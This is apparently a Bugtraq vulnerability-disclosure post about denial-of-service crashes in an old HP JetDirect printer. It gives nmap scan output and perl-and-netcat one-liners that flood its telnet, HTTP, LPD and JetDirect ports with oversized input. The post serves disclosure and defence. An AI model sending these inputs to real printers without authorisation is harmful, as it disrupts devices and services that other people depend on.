> Try scanning the Ip address with nmap -A 10.0.0.1 Hello Bugtraq, While we're talking about printers, some time ago i discovered by accident some lame Denial of Service vulnerabilities in my HP JetDirect printer (tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if they can be reproduced on newer models/firmwares. Here we go: root@charon:~# nmap -A x.x.x.x Interesting ports on printer.mediaservice.pri (x.x.x.x): (The 1655 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 23/tcp open telnet HP JetDirect printer telnetd 80/tcp open http? 515/tcp open printer? 9100/tcp open jetdirect? Device type: printer|print server Running: HP embedded OS details: HP printer w/JetDirect card # telnet -> crash of all network services root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23 # http -> crash of all network services with funny stack dump on paper! ;) root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80 # printer -> the printer switches indefinitely between data recv and ready root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515 # jetdirect -> prints ABCD... and leaves the printer in "unstable" status root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100 I've scanned the funny stack dump printed on paper and put it on-line at: http://www.0xdeadbeef.info/stuff/hp-crash.jpg You should also take a look to Paul Szabo's excellent web resources on PostScript, PJL/PCL, and secure HP printers configuration: http://www.maths.usyd.edu.au:8000/u/psz/ps.html Cheers, -- Marco Ivaldi Antifork Research, Inc. http://0xdeadbeef.info/ 3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
